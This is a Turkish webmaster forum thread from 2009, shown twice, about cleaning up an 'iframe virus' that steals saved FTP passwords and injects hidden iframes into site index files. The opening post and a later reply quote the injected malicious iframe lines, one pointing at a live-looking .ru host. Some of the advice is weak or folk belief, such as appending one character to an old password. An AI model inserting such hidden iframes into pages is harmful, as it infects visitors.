Meşhur iframe virüsünden nasıl kurtulabilirsiniz? - vBulletinData -Türkçe vBulletin Destek ve Bilgi Paylaşım Sitesi

**LoRd** · 06-22-2009, 11:48 AM

echo "<iframe src=\"http://*****.net/?click=6068265\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Sitedeki index.html, index.php gibi dosyalarına bu virüsün kendini eklediği ve silinmesi konusunda zorluklar çıktığı yazılmış. Benimde bir ara başıma gelmişti. R10'daki ilk makalemi de bu lanet iframe'i temizlemeye yönelik yazayım dedim.

Çeşitli versiyonları olsa da temeli aynıdır. Aşağıdaki önerileri uygulayıp yüksek olasılıkla kurtulabilirsiniz.

Dikkat : Google sitede virüsü görürse sizi hemen sıralamalarda aşağılara atabilir. Birde aramalardaki başlığın altında "Dikkat bu site zararlıdır" yazabilir.
Bunun Google kaynaklı kullanıcı sayısına büyük darbe indireceği aşikardır.

Bu virüs nedir, ne yapar?
!!! - index.html, index.php gibi index adlı dosyalarına bu virüsün yukarıdaki gibi iframe kodu ekler. Bu kod virüsün yayılmasını sağlar. İndex dosyalarını görüntüleyen herkese virüs bulaşır.

******Gelen bir uyarıyı ekleyeyim istedim makaleye.
Virüsün yeni versiyonu default.html, default.php ve diğer default adlı dosyalara da bulaşıyormuş eğer varsa bunları da temizleyiniz.

!!! - Ftp programlarındaki kayıtlı şifreleri alarak siz virüsü bilgisayardan ve FTP'nizden sildiğinizde kendini yeniden ekler. (Özellikle CuteFTP varsa)
!!! - Bir çok antivirüs programını atlatmaktadır. Uyarı veriyorlar ama hayır diyene kadar çoktan yazılmış oluyor bilgisayarda gerekli yerlere.
!!! - Bir versiyonunun bilgisayardaki olan index.php vs dosyalarına da bulaşabildiği söyleniyor.

Virüs bulaştı, nasıl kurtulunabilir?
1 - Virüsü kaptığınızı anladığınızda internet bağlantınızı virüsü silinceye kadar kapatın. FTP programlarında kayıtlı şifreniz varsa saniyeler içerisinde yayılmaya başlıyor. Eğer kayıtlı şifre yoksa FTP'ye bulaşmıyor, sadece bilgisayarı etkiliyor.

2 - Antivirüs ve spyware taraması yaptırın. Örn; Son güncelliğiyle bir Kaspersky ve Spy Sweeper tavsiyem. Yoksa ücretsiz AVG ile Ad-aware'yi deneyin. Taramada çıkanları temizleyin ama bitmedi.
Muhtemel virüs çıkabilecek yerlere bakın. Aşağıdaki klasörlere gelip değiştirme tarihine göre dosyaları sıralarsanız kalmışsa virüs exelerini görebilirsiniz.Sabit bir ismi yok her geldiğinde rastgele bir isim alıyor exeler. Çok emin değilseniz silmeyin. Silinmezse bilgisayarı güvenli modda açıp silin.

Masaüstü
Windows
Windows\system32
Documents and Settings\Kullanıcı Adınız\Local Settings
Documents and Settings\Kullanıcı Adınız\\Local Settings\Application Data

3 - CuteFTP tarzı programlarıdaki kayıtlı şifreleri silin. Mesela kullanıcı adı ve ftp adresi kalır. Şifreyi yanlış yazarsanız her açılışta şifreyi sorar, bu aşamada birazdan yeni belirleyebileceğimiz şifreyi yazın.

4 - Virüs temizliğini yaptığınıza eminseniz internet bağlantınızı açın.
ŞİMDİ TARAYICIYLA HİÇ BİR SİTEYE GİRMEYİN. KENDİ SİTENİZ DAHİL. Çünkü virüsü son kaptığınız site ya da virüsün yeni bulaştığını sitelerinizden hemen tekrar alabilirsiniz virüsü.
(tabi güvenilir siteler hariç google vs. ama şu anda amaç virüsü temizlemek

Resmi Gerçek Boyutunda Görmek için Tıklayınız.

)

Sitenizin FTP şifrenizi cPanel'den veya diğer admin yönetim paneline girerek değiştirin. Bunu yaparken siteniz.com/cpanel veya nasıl giriyorsanız o şekilde girin. Virüs bulaşan sitelerin anasayfaları görüntülemekten kaçının.
Şimdi ben şifremi çok severim ama yeni şifre napacam diye düşünüyorsanız fazla düşünmeyin olağan şifrenizin sonuna "?" gibi özel bir karakter, bir harf ya da bir rakam ekleyin, geçin.
Ama FTP şifrelerinizde hem harf hem rakam hemde /%'!^%(!/ tarzı özel karakterlerin ve en az 8-10 hane olması güvenlik açısından önemlidir. (Örn; 4!6k5+a%ak)

5 - Şifreyi değiştirdik. Bilgisayarımız temiz, FTP şifremiz değişti. Ama virüs hala sitemizde. FTP'ye girin tabi şifreyi kaydetmeden. index.html, index.php, index.xxx tarzı tüm dosyaları açıp en üstteki kodun benzerini arayın bulun ve silin.
Eğer dosyalarınız çoksa ücretsiz NOTEPAD2'yi kullanıp silmekte hız kazanabilirsiniz. Virüsün bulaştığı bir index dosyasından kodu kopyalayın. Daha sonra Notepad2'de Edit > Replace (Ctrl+H kısayolu)'i açın.
Search String yazan yere kodu yazın, alt tarafı aynı şekilde boş bırakın ve Replace All'a tıklayın.Kod silindi. Bilgisayarınızdaki dosyalara bulaşmışsa index diye aratın çıkan her dosyayı bu şekilde temizleyin.
Eğer bilgisayarınızda sitenizin temiz yedeği varsa direk üstüne atabilirsiniz. Ama bitmedi okumaya devam edin.

Dikkat : Hosttaki sadece www veya public_html dizinleri değil hosttaki diğer index dosyalarına da bulaşıyor. Bu dizinleri de tarayıp index.xxx dosyalarından silin.
örneğin; /tmp/webalizerftp ve /tmp/webalizer'deki index.html dosyaları.

6 - Şimdi bilgisayarımızda virüs yok, bilgisayardaki dosyalarımızda virüs yok. ftp şifremiz değişti, siteden de virüs yok.
Kısacası şu anda bu virüsten etkilenmeyen birisiyle aynı durumda olmalısınız.

Dikkat : Eğer bu adımları tam olarak yaptığınız halde işe yaramadıysa bilgisayarınıza format atıp, hostunuzun sıfırlanmasını sağlayıp(hesabın kapatıp tekrar açılması), sitenizi sıfırdan tekrar kurmayı deneyiniz.

Bu virüse karşı önlemler nelerdir?
!!! - Benim başıma gelmez demeyin, önlem alın. Hergün girdiğiniz, aylarca virüssüz yayın yapan birisi virüsü kapar ve hemen sizi de etkileyebilir.

!!! - Kesinlikle FTP şifrelerinizi programlarda bırakmayın. Şifreleri aklınızda tutamıyorsanız bir kağıda,cep telefonunuza yazın. Eğer virüs girerde şifre değiştirmek zorunda kalırsanız sürekli kullandığınız şifrenin sonuna bir iki karakter daha eklemeniz yeterlidir, daha kolay ezberlersiniz. abc123 şifrense abc123? yapmak gibi...

!!! - Düzenli yedek alın. Site ve scriptlerinizin son hallerinin yedeklerini bulundurun. Şifreli RAR dosyalarında veya DVD'lerde tutun. Olaki bir olay oldu hemen yedekleri yükleyerek müdahale edebilirsiniz. Diğer türlü uzun uğraşlar gerekiyor.
!!! - İnternette dolaşırken en azından güncellenmiş bir antivirüs programı bulundurun. Ek olarak anti-spyware programı da size yardımcı olacaktır. Ücretli olarak Kaspersky ve Spy Sweeper. Ücretsiz olarakta AVG Free ve Ad-Aware kullanabilirsiniz.

Makale Frekans'a aittir. Kaynak belirterek tüm sitelerinizde yayınlayabilirsiniz. Çevrenizdeki herkesi bilinçlendirin böylece virüs daha az yayılır.
Ayrıca bu virüs konusunda bildiğim herşeyi yazdım. Virüs ile ilgili sorunlar için lütfen Özel Mesaj atmayın. Umarım başınıza gelmez, gelirse de kurtulursunuz.

Takintili - Emo Eğlence ve Paylaşım Sitesi

xLaRj_loRd - takintiLi aDmin

pm ile irtibata geçebilirsiniz.!

KorsanMedya -Her şeyin Korsan'ı Çıkıyor Abi (:

**soneleman** · 07-08-2009, 05:33 AM

Vermiş olduğunuz değerli bilgiler için teşekkürler; yukarıdaki işlemleri yapmaya fazla vaktiniz yoksa ftp şifrenizi değiştirmenizde işe yaramakta tabii en kısa sürede ftp yedeğinizi güncelleyiniz.

SeaSoN · 08-01-2009, 11:37 PM

Arkadaslar bu virus benimde siteme bulastı ama cuteftp den degil filezilladan.Filezilla kendini guncelledi ve virus siteme yayıldı.hostun icindeki tüm index.php ve index.html dosyalarına yazdı kendisini,ayrıca forum sitemdeki boardindex.php ye yazdı.yani indexle alakalı bütün dosyalara kendisini yazıyor.Bu virus ayrıca pc'min kayıt defterinide kapattı tam 3 kere formatlamama ragmen virusten kurtulamadım.Bilgsayarım aynı zamanda bu virus yuzunden devamlı dosya alıyor dosya gonderiyor durumuna geldi.Yani kotadanda yemeye basladı.Sonunda temızledim ama web sayfamın ftp sifrelerini degismama ragmen dosyalarda acık olusturdugu için ne kadar silerseniz silin yine aynı dosyalara kendisini yazıyor.ilk baslarda kodların ya altına yada ust kısmına yazıyordu virus iframe kodlarını ,son olarak kodların ortasına yazdı ve kendisinden sonra gelen php kodlarını sildi.Bu virusu pc'nizden silmediginiz surece FTP'nize girmemenizi tavsiye ederim.cuteftp,Blazeftp,Filezilla kullanmayın.Pcden virusu temizlemeye gelince once modeminizi resetleyin yada resetletin ve pcnize baglamayın,sonra HDD'nizi biçimlendirin ve formata baslamadan once pcnizin elektirigini 5ila10 dakika kesin Ramlerdeki(RAM) elektirigin bosalması lazım.Bu işlemi yaptıktan sonra pcnizi formatlayın.Format işlemi bittikten sonra Nod32 veya Kaspersky virus programını kurun pcnize.Bu iki virus programı en iyilerindedir.Virus programını kurduktan sonra pcnizin dosyalarını taratın.Pcniz viruslerden arınmış bir sekilde emrinizde.Ftpden sitenizin yedegini cekip iframe kodlarını silin ve tekrar Ftpye atın.Siteniz ancak bu sekilde bu virusten arınır.Benim tavsiyem bunlar umarım işinize yarar.Çünkü virüsün son darbesi agır oluyor.İlk basta 1x1 iframe atarken en sonunda 125x123 iframe atıp sitenizin kodlarını dagıtıyor.Bastada belirttigim gibi kod kendisinden sonraki kodları siliyor.Kolay Gelsin....:cool:

**LoRd** · 08-02-2009, 11:08 AM

Öncelikle Ftp bilgilerinizin tamamını değiştirin..
Bilgisayarı taratın sağLam bi antivirüs vasıtası ile..

Ftp'yi pc.nize indirin.
ve dosyaları birer birer taratın.

Virüs varsa temizleyin.

Daha sonra index.php index.html leri açın ve yabancı kodların hepsini temizleyin.
Not: Admincp ve İncludes deki butun .txt bulaşmıştır.
Tek tek açıp kodları temizleyin.

Eğerki orjinal dosyalarınız varsa şifreleri değiştirdikten sonra ;
1.Adım:
Forumun kurulu olduğu dizinin içini boşaltıyoruz.
2.Adım:
Orjinal dosyaları Ftpden atıyoruz.Boşaltığımız dizinin içine.
3.Adım:
Herhangi bir eklenti (vbseo,sitemap generatör,ruh hali vs.) daha önce kurulu ise, bu dosyaların ftpye atılacak kısımlarını tekrardan atıyoruz.
Çünkü; önce attıklarımızı tamamen sildik.

Bu kadar arkadaşlar.
Yardımcı olmaya çalıştım.
İnş yardımcı olmuşumdur.

**MuRaTCaN** · 08-03-2009, 08:22 AM

Kod:

        <iframe src="http://x9n.ru:8080/index.php" width=140 height=118 style="visibility: hidden"></iframe>

benim sitedeki indexlerdeki virüs bu işde adi

Artesh · 08-03-2009, 05:32 PM

cpanelde vırus scane varsa ordan sılebılırsınız

osmankutlu · 08-26-2009, 10:45 AM

Paylaşım için teşekkürler bende çözümü kasperkyle buldum

FiRaRi · 08-30-2009, 01:17 AM

Teşekkürler

**Jhan** · 09-01-2009, 06:16 PM

Kaspersky Anti-Virüs 2009 İle Full Tarat Hdd Leri Makinaya Temiz Format Ftp ye tekrar at indexleri index.html leri sil site canavar

06-22-2009, 11:48 AM	#1 (permalink)
LoRd Vip Üye Date: Sep 2008 Mesajlar: 849 Tecrübe Puanı: 26	Meşhur iframe virüsünden nasıl kurtulabilirsiniz? echo "<iframe src=\"http://***.net/?click=6068265\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; Sitedeki index.html, index.php gibi dosyalarına bu virüsün kendini eklediği ve silinmesi konusunda zorluklar çıktığı yazılmış. Benimde bir ara başıma gelmişti. R10'daki ilk makalemi de bu lanet iframe'i temizlemeye yönelik yazayım dedim. Çeşitli versiyonları olsa da temeli aynıdır. Aşağıdaki önerileri uygulayıp yüksek olasılıkla kurtulabilirsiniz. Dikkat : Google sitede virüsü görürse sizi hemen sıralamalarda aşağılara atabilir. Birde aramalardaki başlığın altında "Dikkat bu site zararlıdır" yazabilir. Bunun Google kaynaklı kullanıcı sayısına büyük darbe indireceği aşikardır. Bu virüs nedir, ne yapar? !!! - index.html, index.php gibi index adlı dosyalarına bu virüsün yukarıdaki gibi iframe kodu ekler. Bu kod virüsün yayılmasını sağlar. İndex dosyalarını görüntüleyen herkese virüs bulaşır. **Gelen bir uyarıyı ekleyeyim istedim makaleye. Virüsün yeni versiyonu default.html, default.php ve diğer default adlı dosyalara da bulaşıyormuş eğer varsa bunları da temizleyiniz. !!! - Ftp programlarındaki kayıtlı şifreleri alarak siz virüsü bilgisayardan ve FTP'nizden sildiğinizde kendini yeniden ekler. (Özellikle CuteFTP varsa) !!! - Bir çok antivirüs programını atlatmaktadır. Uyarı veriyorlar ama hayır diyene kadar çoktan yazılmış oluyor bilgisayarda gerekli yerlere. !!! - Bir versiyonunun bilgisayardaki olan index.php vs dosyalarına da bulaşabildiği söyleniyor. Virüs bulaştı, nasıl kurtulunabilir? 1 - Virüsü kaptığınızı anladığınızda internet bağlantınızı virüsü silinceye kadar kapatın. FTP programlarında kayıtlı şifreniz varsa saniyeler içerisinde yayılmaya başlıyor. Eğer kayıtlı şifre yoksa FTP'ye bulaşmıyor, sadece bilgisayarı etkiliyor. 2 - Antivirüs ve spyware taraması yaptırın. Örn; Son güncelliğiyle bir Kaspersky ve Spy Sweeper tavsiyem. Yoksa ücretsiz AVG ile Ad-aware'yi deneyin. Taramada çıkanları temizleyin ama bitmedi. Muhtemel virüs çıkabilecek yerlere bakın. Aşağıdaki klasörlere gelip değiştirme tarihine göre dosyaları sıralarsanız kalmışsa virüs exelerini görebilirsiniz.Sabit bir ismi yok her geldiğinde rastgele bir isim alıyor exeler. Çok emin değilseniz silmeyin. Silinmezse bilgisayarı güvenli modda açıp silin. Masaüstü Windows Windows\system32 Documents and Settings\Kullanıcı Adınız\Local Settings Documents and Settings\Kullanıcı Adınız\\Local Settings\Application Data 3 - CuteFTP tarzı programlarıdaki kayıtlı şifreleri silin. Mesela kullanıcı adı ve ftp adresi kalır. Şifreyi yanlış yazarsanız her açılışta şifreyi sorar, bu aşamada birazdan yeni belirleyebileceğimiz şifreyi yazın. 4 - Virüs temizliğini yaptığınıza eminseniz internet bağlantınızı açın. ŞİMDİ TARAYICIYLA HİÇ BİR SİTEYE GİRMEYİN. KENDİ SİTENİZ DAHİL. Çünkü virüsü son kaptığınız site ya da virüsün yeni bulaştığını sitelerinizden hemen tekrar alabilirsiniz virüsü. (tabi güvenilir siteler hariç google vs. ama şu anda amaç virüsü temizlemek ) Sitenizin FTP şifrenizi cPanel'den veya diğer admin yönetim paneline girerek değiştirin. Bunu yaparken siteniz.com/cpanel veya nasıl giriyorsanız o şekilde girin. Virüs bulaşan sitelerin anasayfaları görüntülemekten kaçının. Şimdi ben şifremi çok severim ama yeni şifre napacam diye düşünüyorsanız fazla düşünmeyin olağan şifrenizin sonuna "?" gibi özel bir karakter, bir harf ya da bir rakam ekleyin, geçin. Ama FTP şifrelerinizde hem harf hem rakam hemde /%'!^%(!/ tarzı özel karakterlerin ve en az 8-10 hane olması güvenlik açısından önemlidir. (Örn; 4!6k5+a%ak) 5 - Şifreyi değiştirdik. Bilgisayarımız temiz, FTP şifremiz değişti. Ama virüs hala sitemizde. FTP'ye girin tabi şifreyi kaydetmeden. index.html, index.php, index.xxx tarzı tüm dosyaları açıp en üstteki kodun benzerini arayın bulun ve silin. Eğer dosyalarınız çoksa ücretsiz NOTEPAD2'yi kullanıp silmekte hız kazanabilirsiniz. Virüsün bulaştığı bir index dosyasından kodu kopyalayın. Daha sonra Notepad2'de Edit > Replace (Ctrl+H kısayolu)'i açın. Search String yazan yere kodu yazın, alt tarafı aynı şekilde boş bırakın ve Replace All'a tıklayın.Kod silindi. Bilgisayarınızdaki dosyalara bulaşmışsa index diye aratın çıkan her dosyayı bu şekilde temizleyin. Eğer bilgisayarınızda sitenizin temiz yedeği varsa direk üstüne atabilirsiniz. Ama bitmedi okumaya devam edin. Dikkat : Hosttaki sadece www veya public_html dizinleri değil hosttaki diğer index dosyalarına da bulaşıyor. Bu dizinleri de tarayıp index.xxx dosyalarından silin. örneğin; /tmp/webalizerftp ve /tmp/webalizer'deki index.html dosyaları. 6 - Şimdi bilgisayarımızda virüs yok, bilgisayardaki dosyalarımızda virüs yok. ftp şifremiz değişti, siteden de virüs yok. Kısacası şu anda bu virüsten etkilenmeyen birisiyle aynı durumda olmalısınız. Dikkat : Eğer bu adımları tam olarak yaptığınız halde işe yaramadıysa bilgisayarınıza format atıp, hostunuzun sıfırlanmasını sağlayıp(hesabın kapatıp tekrar açılması), sitenizi sıfırdan tekrar kurmayı deneyiniz. Bu virüse karşı önlemler nelerdir? !!! - Benim başıma gelmez demeyin, önlem alın. Hergün girdiğiniz, aylarca virüssüz yayın yapan birisi virüsü kapar ve hemen sizi de etkileyebilir. !!! - Kesinlikle FTP şifrelerinizi programlarda bırakmayın. Şifreleri aklınızda tutamıyorsanız bir kağıda,cep telefonunuza yazın. Eğer virüs girerde şifre değiştirmek zorunda kalırsanız sürekli kullandığınız şifrenin sonuna bir iki karakter daha eklemeniz yeterlidir, daha kolay ezberlersiniz. abc123 şifrense abc123? yapmak gibi... !!! - Düzenli yedek alın. Site ve scriptlerinizin son hallerinin yedeklerini bulundurun. Şifreli RAR dosyalarında veya DVD'lerde tutun. Olaki bir olay oldu hemen yedekleri yükleyerek müdahale edebilirsiniz. Diğer türlü uzun uğraşlar gerekiyor. !!! - İnternette dolaşırken en azından güncellenmiş bir antivirüs programı bulundurun. Ek olarak anti-spyware programı da size yardımcı olacaktır. Ücretli olarak Kaspersky ve Spy Sweeper. Ücretsiz olarakta AVG Free ve Ad-Aware kullanabilirsiniz. Makale Frekans'a aittir. Kaynak belirterek tüm sitelerinizde yayınlayabilirsiniz. Çevrenizdeki herkesi bilinçlendirin böylece virüs daha az yayılır. Ayrıca bu virüs konusunda bildiğim herşeyi yazdım. Virüs ile ilgili sorunlar için lütfen Özel Mesaj atmayın. Umarım başınıza gelmez, gelirse de kurtulursunuz. Takintili - Emo Eğlence ve Paylaşım Sitesi xLaRj_loRd - takintiLi aDmin pm ile irtibata geçebilirsiniz.! KorsanMedya -Her şeyin Korsan'ı Çıkıyor Abi** (:

07-08-2009, 05:33 AM	#2 (permalink)
soneleman Lisanslı Kullanıcı Date: Dec 2008 Mesajlar: 140 Tecrübe Puanı: 10	Vermiş olduğunuz değerli bilgiler için teşekkürler; yukarıdaki işlemleri yapmaya fazla vaktiniz yoksa ftp şifrenizi değiştirmenizde işe yaramakta tabii en kısa sürede ftp yedeğinizi güncelleyiniz. *..:: Teknik Paylaşım Platformu* ::..**

08-01-2009, 11:37 PM	#3 (permalink)
SeaSoN Kayıtlı Üye Date: Aug 2009 Mesajlar: 1 Tecrübe Puanı: 0	Sadece FTP sifrelerini degismek yeterli degil Arkadaslar bu virus benimde siteme bulastı ama cuteftp den degil filezilladan.Filezilla kendini guncelledi ve virus siteme yayıldı.hostun icindeki tüm index.php ve index.html dosyalarına yazdı kendisini,ayrıca forum sitemdeki boardindex.php ye yazdı.yani indexle alakalı bütün dosyalara kendisini yazıyor.Bu virus ayrıca pc'min kayıt defterinide kapattı tam 3 kere formatlamama ragmen virusten kurtulamadım.Bilgsayarım aynı zamanda bu virus yuzunden devamlı dosya alıyor dosya gonderiyor durumuna geldi.Yani kotadanda yemeye basladı.Sonunda temızledim ama web sayfamın ftp sifrelerini degismama ragmen dosyalarda acık olusturdugu için ne kadar silerseniz silin yine aynı dosyalara kendisini yazıyor.ilk baslarda kodların ya altına yada ust kısmına yazıyordu virus iframe kodlarını ,son olarak kodların ortasına yazdı ve kendisinden sonra gelen php kodlarını sildi.Bu virusu pc'nizden silmediginiz surece FTP'nize girmemenizi tavsiye ederim.cuteftp,Blazeftp,Filezilla kullanmayın.Pcden virusu temizlemeye gelince once modeminizi resetleyin yada resetletin ve pcnize baglamayın,sonra HDD'nizi biçimlendirin ve formata baslamadan once pcnizin elektirigini 5ila10 dakika kesin Ramlerdeki(RAM) elektirigin bosalması lazım.Bu işlemi yaptıktan sonra pcnizi formatlayın.Format işlemi bittikten sonra Nod32 veya Kaspersky virus programını kurun pcnize.Bu iki virus programı en iyilerindedir.Virus programını kurduktan sonra pcnizin dosyalarını taratın.Pcniz viruslerden arınmış bir sekilde emrinizde.Ftpden sitenizin yedegini cekip iframe kodlarını silin ve tekrar Ftpye atın.Siteniz ancak bu sekilde bu virusten arınır.Benim tavsiyem bunlar umarım işinize yarar.Çünkü virüsün son darbesi agır oluyor.İlk basta 1x1 iframe atarken en sonunda 125x123 iframe atıp sitenizin kodlarını dagıtıyor.Bastada belirttigim gibi kod kendisinden sonraki kodları siliyor.Kolay Gelsin....:cool:

08-02-2009, 11:08 AM	#4 (permalink)
LoRd Vip Üye Date: Sep 2008 Mesajlar: 849 Tecrübe Puanı: 26	Öncelikle Ftp bilgilerinizin tamamını değiştirin.. Bilgisayarı taratın sağLam bi antivirüs vasıtası ile.. Ftp'yi pc.nize indirin. ve dosyaları birer birer taratın. Virüs varsa temizleyin. Daha sonra index.php index.html leri açın ve yabancı kodların hepsini temizleyin. Not: Admincp ve İncludes deki butun .txt bulaşmıştır. Tek tek açıp kodları temizleyin. Eğerki orjinal dosyalarınız varsa şifreleri değiştirdikten sonra ; 1.Adım: Forumun kurulu olduğu dizinin içini boşaltıyoruz. 2.Adım: Orjinal dosyaları Ftpden atıyoruz.Boşaltığımız dizinin içine. 3.Adım: Herhangi bir eklenti (vbseo,sitemap generatör,ruh hali vs.) daha önce kurulu ise, bu dosyaların ftpye atılacak kısımlarını tekrardan atıyoruz. Çünkü; önce attıklarımızı tamamen sildik. Bu kadar arkadaşlar. Yardımcı olmaya çalıştım. İnş yardımcı olmuşumdur. Takintili - Emo Eğlence ve Paylaşım Sitesi xLaRj_loRd - takintiLi aDmin pm ile irtibata geçebilirsiniz.! KorsanMedya -Her şeyin Korsan'ı Çıkıyor Abi (: Konu LoRd tarafından (02-16-2010 Saat 08:25 AM ) değiştirilmiştir.

08-03-2009, 08:22 AM	#5 (permalink)
MuRaTCaN www.MuRaTCaN25.com Date: May 2009 Mesajlar: 3.720 Tecrübe Puanı: 1000	Kod: <iframe src="http://x9n.ru:8080/index.php" width=140 height=118 style="visibility: hidden"></iframe> benim sitedeki indexlerdeki virüs bu işde adi Kader ızdırap ağını, Ömrüme örer gibi Mutluluk senin neyine, Gerek der gibi... www.MuRaTCaN25.com ~~ www.XpLaNSeR.com =) Mp3Cagi.org - www.Mp3Cagi.Biz ~~ / MuRaTCaN

08-03-2009, 05:32 PM	#6 (permalink)
Artesh Kayıtlı Üye Date: Jan 2008 Mesajlar: 0 Tecrübe Puanı: 0	cpanelde vırus scane varsa ordan sılebılırsınız

08-26-2009, 10:45 AM	#7 (permalink)
osmankutlu Kayıtlı Üye Date: Apr 2009 Mesajlar: 5 Tecrübe Puanı: 0	Paylaşım için teşekkürler bende çözümü kasperkyle buldum

08-30-2009, 01:17 AM	#8 (permalink)
FiRaRi Kayıtlı Üye Date: Jul 2009 Mesajlar: 90 Tecrübe Puanı: 6	Teşekkürler

09-01-2009, 06:16 PM	#9 (permalink)
Jhan Lisanslı Kullanıcı Date: Jul 2009 Mesajlar: 525 Tecrübe Puanı: 15	Kaspersky Anti-Virüs 2009 İle Full Tarat Hdd Leri Makinaya Temiz Format Ftp ye tekrar at indexleri index.html leri sil site canavar

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç